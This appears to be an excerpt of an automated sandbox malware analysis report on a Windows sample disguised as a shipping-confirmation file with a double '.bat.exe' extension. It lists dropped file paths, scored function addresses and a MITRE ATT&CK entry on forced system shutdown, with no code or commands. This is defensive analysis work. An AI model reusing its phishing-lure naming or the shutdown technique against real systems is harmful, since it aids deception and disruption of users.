C:\Users\user\eftermodnendes\ringeagt\Daystars216.tre

C:\Users\user\eftermodnendes\ringeagt\Garantis131.Sul

C:\Users\user\eftermodnendes\ringeagt\Opvejende.Kej

C:\Users\user\eftermodnendes\ringeagt\Skvinge18.alt

C:\Users\user\eftermodnendes\ringeagt\bttefulde.tox

Windows Analysis Report
Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Function 00403645 Relevance: 88.0, APIs: 32, Strings: 18, Instructions: 464
stringfilecomCOMMON

Function 00405D8E Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 00406DA0 Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Function 00403D54 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 004030D5 Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 204
memoryCOMMON

Function 004066BF Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204
stringCOMMON

Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Function 00406A06 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Function 733B1817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Function 0040347E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101
COMMON

Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Function 0040248F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Function 004061A1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre